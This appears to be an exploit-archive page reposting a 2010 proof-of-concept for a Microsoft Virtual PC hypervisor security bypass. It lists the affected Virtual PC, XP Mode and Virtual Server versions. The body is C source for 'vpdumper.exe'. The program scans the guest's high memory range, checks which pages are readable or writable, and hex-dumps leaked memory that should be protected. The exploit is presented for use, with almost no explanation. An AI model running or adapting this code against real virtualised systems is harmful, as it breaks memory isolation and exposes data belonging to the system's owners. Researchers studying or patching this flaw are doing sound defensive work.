首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerab
来源:neconomou@corest.com 作者:Nicolas 发布时间:2010-03-17  
=====================================================================================
Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability
=====================================================================================

Vulnerable:  	 Microsoft Windows Virtual PC 0
Microsoft Windows 7 XP Mode 0
Microsoft Virtual Server 2005 0
Microsoft Virtual PC 2007 SP1
Microsoft Virtual PC 2007 0


#include <windows.h>
#include <stdio.h>
#include <ctype.h>
     
#define ROWS 16

void find_leaked_memory ( void );
void print_data ( unsigned int , char * , unsigned int );

int main ( void )
{
   /* message for users */
    printf ( "n*********** vpdumper.exe ***********" );
    printf ( "nCreated by Nicolas A. Economou ( neconomou@corest.com )" );
    printf ( "nCore Security Technologies, Buenos Aires, Argentina ( 2010 )n" );

    /* Search and Print leaked memory */
    printf ( "nsearching leaked memoryn" );
    find_leaked_memory ();

    return ( 1 );
}

void find_leaked_memory ( void )
{
        char buffer [ 0x1000 ];
        char *base;
        int r, w;

        /* search the high address memory area */
        for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 )
        {
          /* Dark Area */
          if ( ( unsigned int ) base == 0xe839c000 )
          {
            continue;
          }

          /* Inicialize flags */
          r = FALSE;
          w = FALSE;

          /* check readable */
          if ( IsBadReadPtr ( base , 1 ) == FALSE )
          {
            /* set flag */
            r = TRUE;
          }
          /* check writeable */
          if ( IsBadWritePtr ( base , 1 ) == FALSE )
          {
            /* set flag */
            w = TRUE;
          }
          /* if readable or writeable */
          if ( r == TRUE || w == TRUE )
          {
            /* get contents into our buffer */
            memcpy ( buffer , base , 0x1000 );

            /* print page attributes */
            printf ( "attributes: " );
            printf ( "%s" , ( r == TRUE ) ? "R":"" );
            printf ( "%s" , ( w == TRUE ) ? "W":"" );
            printf ( "n" );

            /* print the memory */
            print_data ( ( unsigned int ) base , buffer , 0x1000 );
          }
        }
}

void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir )
{
  unsigned int cont;
  unsigned int i;

/* Imprimo las lineas encontradas */
  for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS )
  {
  /* Imprimo la direccion de la memoria */
    printf ( "%.8x | " , direccion );

  /* Incremento la direccion a mostrar */
    direccion = direccion + ROWS;
    
  /* Imprimo en hexa */
    for ( i = 0 ; i < ROWS ; i ++ )
    {
    /* Imprimo la cantidad que pedi */  
      if ( i < ( bytes_a_imprimir - cont ) )
      {
        printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] );
      }
      else
      {
        printf ( "   " );
      }
    }
  /* Espacio entre las 2 columnas */
    printf ( "| " );
  /* Imprimo en caracteres */  
    for ( i = 0 ; i < ROWS ; i ++ )
    {
      if ( i < ( bytes_a_imprimir - cont ) )
      {
        printf ( "%c" , ( isgraph ( buffer [ i + cont ] ) ) ? buffer [ i + cont ] : '.' );
      }
      else
      {
        printf ( " " );
      }
    }
  /* Fin de linea */
    printf ( "n" );
  }
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·iPhone Springboard Malformed C
·WFTPD 3.3 Remote REST DoS
·ArGoSoft FTP Server .NET v.1.0
·Windisc Stack BOF exploit
·QuickZip 4.60.019 Stack BOF -
·Oracle XDB FTP service UNLOCK
·# SWINGETTE 1.1 (.mp3) Buffer
·arp_sniff.c
·Liquid XML Studio 2010 <= v8.0
·Linux Kernel 'net/ipv6/ip6_out
·Open & Compact FTPd 1.2 Pre-Au
·Linux Kernel 'fasync_helper()'
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved